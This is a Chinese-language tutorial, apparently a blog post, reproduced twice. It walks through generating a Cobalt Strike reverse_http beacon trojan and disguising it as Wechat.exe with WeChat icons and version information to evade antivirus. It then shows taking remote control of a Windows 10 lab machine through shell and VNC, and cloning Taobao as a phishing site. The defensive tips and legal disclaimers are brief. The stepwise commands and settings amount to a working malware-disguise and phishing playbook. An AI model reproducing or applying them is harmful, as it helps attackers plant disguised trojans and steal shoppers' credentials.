前置合规声明本文所有操作仅在个人授权Windows10靶机、私有局域网环境内完成仅供网络安全人员学习攻防原理、制定防御策略。根据《中华人民共和国网络安全法》《中华人民共和国刑法》未经授权对任何公网/内网设备、网站进行入侵、控制、钓鱼诈骗均属于违法犯罪行为本人与本文不承担任何非法使用造成的一切后果。1. 环境介绍1.1 实验环境攻击机Kali Linux 2025搭载CobaltStrike 4.7受害靶机Windows 10 x64 测试授权靶场环境伪装工具Restorator 2018EXE图标、版本信息篡改免杀攻击机IP 192.168.154.128通信端口木马监听 54321、钓鱼网站 12441.2 攻击流程1.Kali启动CS服务端 → 配置54321端口监听器 → 生成原生CS木马 → Restorator图标和版本信息伪装免杀 → 木马投递靶机上线 → 会话交互 → 远程桌面控制2.1244端口搭建淘宝钓鱼站2. Kali部署CobaltStrike2.1 关闭占用端口服务为后续80端口钓鱼服务正常运行关闭本地占用端口服务# 关闭apache服务 sudo systemctl stop apache2 sudo systemctl disable apache2 # 关闭nginx服务 sudo systemctl stop nginx sudo systemctl disable nginx # 赋予Java绑定低端口权限 sudo setcap cap_net_bind_serviceep /usr/bin/java2.2 启动CS服务端与客户端# 进入CS存放目录 cd /home/kali/Desktop/cs4.7-cn # 启动TeamServer服务端IP自定义密码 sudo ./teamserver 192.168.154.128 kali # 启动客户端 ./cobaltstrike客户端填写服务端IP、密码即可成功连接CS团队服务器3. 配置端口监听器生成木马3.1 创建监听器1. 顶部菜单栏监听器 → 添加2. 参数配置- 载荷 windows/beacon_http/reverse_http- 回连IP 192.168.154.128- 回连端口 54321- 自定义名称Kali23. 保存配置监听器创建完成3.2 生成恶意木马1. 顶部菜单栏攻击 → 生成 → Windows可执行程序2. 配置参数- 选择监听器Kali- 架构x64- 格式Windows EXE- 输出文件名artifact.exe原生CS生成的木马特征极其明显默认图标空白、无任何软件版本信息极易被杀毒软件查杀所以需要进一步伪装免杀。4. Restorator软件伪装免杀原生CS木马特征显著我们使用 Restorator 对木马进行深度伪装替换正常软件图标、填充官方版本信息欺骗Windows系统与杀毒软件降低查杀概率。4.1 Restorator工具介绍Restorator 是一款经典的 PE资源编辑工具可以修改EXE程序的- 程序图标ICO- 产品名称、公司版权- 版本号、文件描述- 程序资源信息让木马从“空白未知程序”伪装成“正规官方软件”。4.2 免杀伪装详细步骤1. 准备正常正规软件源文件选取一款大众正规软件作者选的是企业微信等的原版EXE用于提取正版图标和版本信息。2. 拖入原生木马 artifact.exe 到 Restorator软件自动解析PE程序所有资源。3. 替换程序图标- 左侧选择 Icon 图标资源- 删除原有空白默认图标- 导入从正规软件提取的 高清ICO图标- 替换所有尺寸图标1616、3232、64*644. 修改版本信息核心免杀点找到 Version 版本信息 栏目手动填充正规软件真实信息- 产品名称- 公司名称- 文件版本- 产品版本- 版权信息- 文件描述填充完成后木马在系统属性中和正常商用软件完全一致无任何可疑空白信息。5. 保存生成伪装木马文件 → 另存为 Wechat.exe至此带正规图标、完整版本信息的伪装木马制作完成。5. 靶机上线 和 会话交互5.1 靶机上线将 Restorator 处理后的伪装木马 Wechat.exe 上传至Windows10靶机并运行。因为图标、版本信息全部伪装为正常软件用户无感知双击运行即可回连攻击机。CS控制台成功捕获靶机上线会话获取完全控制权限。5.2 常用CS Beacon指令# 获取当前登录用户 getuid # 获取靶机完整系统信息 sysinfo # 查看靶机所有运行进程 ps # 执行Windows系统命令 shell ipconfig shell whoami6. 靶机远程桌面控制右键目标会话在菜单里选择浏览探测之后点击VNC桌面管理从而实现对目标主机的图形化远程控制包括查看屏幕、操作鼠标键盘。7. 1244端口淘宝钓鱼网站7.1 功能说明利用CS自带的站点管理的站点克隆功能在1244 端口搭建高仿淘宝页面用于钓鱼测试与安全研究。7.2 打开站点管理在 Cobalt Strike 菜单栏点击站点管理→网站克隆打开克隆配置窗口7.3 Clone Site 克隆淘宝页面1. 点击站点管理 → 站点克隆2. 参数配置- 克隆 URL https://www.taobao.com- 本地 Host 192.168.154.128- 本地 端口 12443. 点击「克隆」按钮CS会自动生成一个和淘宝外观一模一样的“钓鱼网站”。7.4 访问钓鱼页面靶机浏览器访问http://192.168.154.128 :1244页面与官方淘宝几乎完全一致。8. 实验常见问题解决8.1 54321端口无法上线- 靶机、攻击机网络互通- 防火墙未拦截54321端口- 监听器端口与木马端口一致8.2 Restorator修改后木马打不开- 保存时选择「完全保存资源」- 不要修改PE头部参数仅修改图标与版本9. 企业防御方案9.1 终端防御- 查杀无数字签名、异常资源篡改EXE文件- 监控陌生程序54321等非常规端口外联- 校验程序图标、版本信息是否匹配官方白名单9.2 网络防御- 拦截IP地址形式的电商访问- 监测CS beacon心跳流量特征- 封禁恶意80端口仿冒站点9.3 人员安全- 不随意运行来路不明“正规图标”软件- 网购仅访问官方HTTPS域名10. 总结本文完整演示了CS 54321端口木马生成 → Restorator图标版本深度伪装免杀 → Win10靶机上线控制 → 远程桌面 和1234端口淘宝网站克隆钓鱼的完整红队攻击。现在黑产木马普遍不再使用默认裸木马都会通过资源修改工具伪装成正常软件。安全从业者必须熟悉此类伪装手段才能更好地检测、查杀、防御伪装型恶意程序。再次提醒本实验仅限授权安全研究严禁非法入侵与钓鱼诈骗
CobaltStrike完整攻击详解
发布时间:2026/6/1 23:13:17
前置合规声明本文所有操作仅在个人授权Windows10靶机、私有局域网环境内完成仅供网络安全人员学习攻防原理、制定防御策略。根据《中华人民共和国网络安全法》《中华人民共和国刑法》未经授权对任何公网/内网设备、网站进行入侵、控制、钓鱼诈骗均属于违法犯罪行为本人与本文不承担任何非法使用造成的一切后果。1. 环境介绍1.1 实验环境攻击机Kali Linux 2025搭载CobaltStrike 4.7受害靶机Windows 10 x64 测试授权靶场环境伪装工具Restorator 2018EXE图标、版本信息篡改免杀攻击机IP 192.168.154.128通信端口木马监听 54321、钓鱼网站 12441.2 攻击流程1.Kali启动CS服务端 → 配置54321端口监听器 → 生成原生CS木马 → Restorator图标和版本信息伪装免杀 → 木马投递靶机上线 → 会话交互 → 远程桌面控制2.1244端口搭建淘宝钓鱼站2. Kali部署CobaltStrike2.1 关闭占用端口服务为后续80端口钓鱼服务正常运行关闭本地占用端口服务# 关闭apache服务 sudo systemctl stop apache2 sudo systemctl disable apache2 # 关闭nginx服务 sudo systemctl stop nginx sudo systemctl disable nginx # 赋予Java绑定低端口权限 sudo setcap cap_net_bind_serviceep /usr/bin/java2.2 启动CS服务端与客户端# 进入CS存放目录 cd /home/kali/Desktop/cs4.7-cn # 启动TeamServer服务端IP自定义密码 sudo ./teamserver 192.168.154.128 kali # 启动客户端 ./cobaltstrike客户端填写服务端IP、密码即可成功连接CS团队服务器3. 配置端口监听器生成木马3.1 创建监听器1. 顶部菜单栏监听器 → 添加2. 参数配置- 载荷 windows/beacon_http/reverse_http- 回连IP 192.168.154.128- 回连端口 54321- 自定义名称Kali23. 保存配置监听器创建完成3.2 生成恶意木马1. 顶部菜单栏攻击 → 生成 → Windows可执行程序2. 配置参数- 选择监听器Kali- 架构x64- 格式Windows EXE- 输出文件名artifact.exe原生CS生成的木马特征极其明显默认图标空白、无任何软件版本信息极易被杀毒软件查杀所以需要进一步伪装免杀。4. Restorator软件伪装免杀原生CS木马特征显著我们使用 Restorator 对木马进行深度伪装替换正常软件图标、填充官方版本信息欺骗Windows系统与杀毒软件降低查杀概率。4.1 Restorator工具介绍Restorator 是一款经典的 PE资源编辑工具可以修改EXE程序的- 程序图标ICO- 产品名称、公司版权- 版本号、文件描述- 程序资源信息让木马从“空白未知程序”伪装成“正规官方软件”。4.2 免杀伪装详细步骤1. 准备正常正规软件源文件选取一款大众正规软件作者选的是企业微信等的原版EXE用于提取正版图标和版本信息。2. 拖入原生木马 artifact.exe 到 Restorator软件自动解析PE程序所有资源。3. 替换程序图标- 左侧选择 Icon 图标资源- 删除原有空白默认图标- 导入从正规软件提取的 高清ICO图标- 替换所有尺寸图标1616、3232、64*644. 修改版本信息核心免杀点找到 Version 版本信息 栏目手动填充正规软件真实信息- 产品名称- 公司名称- 文件版本- 产品版本- 版权信息- 文件描述填充完成后木马在系统属性中和正常商用软件完全一致无任何可疑空白信息。5. 保存生成伪装木马文件 → 另存为 Wechat.exe至此带正规图标、完整版本信息的伪装木马制作完成。5. 靶机上线 和 会话交互5.1 靶机上线将 Restorator 处理后的伪装木马 Wechat.exe 上传至Windows10靶机并运行。因为图标、版本信息全部伪装为正常软件用户无感知双击运行即可回连攻击机。CS控制台成功捕获靶机上线会话获取完全控制权限。5.2 常用CS Beacon指令# 获取当前登录用户 getuid # 获取靶机完整系统信息 sysinfo # 查看靶机所有运行进程 ps # 执行Windows系统命令 shell ipconfig shell whoami6. 靶机远程桌面控制右键目标会话在菜单里选择浏览探测之后点击VNC桌面管理从而实现对目标主机的图形化远程控制包括查看屏幕、操作鼠标键盘。7. 1244端口淘宝钓鱼网站7.1 功能说明利用CS自带的站点管理的站点克隆功能在1244 端口搭建高仿淘宝页面用于钓鱼测试与安全研究。7.2 打开站点管理在 Cobalt Strike 菜单栏点击站点管理→网站克隆打开克隆配置窗口7.3 Clone Site 克隆淘宝页面1. 点击站点管理 → 站点克隆2. 参数配置- 克隆 URL https://www.taobao.com- 本地 Host 192.168.154.128- 本地 端口 12443. 点击「克隆」按钮CS会自动生成一个和淘宝外观一模一样的“钓鱼网站”。7.4 访问钓鱼页面靶机浏览器访问http://192.168.154.128 :1244页面与官方淘宝几乎完全一致。8. 实验常见问题解决8.1 54321端口无法上线- 靶机、攻击机网络互通- 防火墙未拦截54321端口- 监听器端口与木马端口一致8.2 Restorator修改后木马打不开- 保存时选择「完全保存资源」- 不要修改PE头部参数仅修改图标与版本9. 企业防御方案9.1 终端防御- 查杀无数字签名、异常资源篡改EXE文件- 监控陌生程序54321等非常规端口外联- 校验程序图标、版本信息是否匹配官方白名单9.2 网络防御- 拦截IP地址形式的电商访问- 监测CS beacon心跳流量特征- 封禁恶意80端口仿冒站点9.3 人员安全- 不随意运行来路不明“正规图标”软件- 网购仅访问官方HTTPS域名10. 总结本文完整演示了CS 54321端口木马生成 → Restorator图标版本深度伪装免杀 → Win10靶机上线控制 → 远程桌面 和1234端口淘宝网站克隆钓鱼的完整红队攻击。现在黑产木马普遍不再使用默认裸木马都会通过资源修改工具伪装成正常软件。安全从业者必须熟悉此类伪装手段才能更好地检测、查杀、防御伪装型恶意程序。再次提醒本实验仅限授权安全研究严禁非法入侵与钓鱼诈骗
用C++实现信奥题 P9509 『STA - R3』Aulvwc)
)
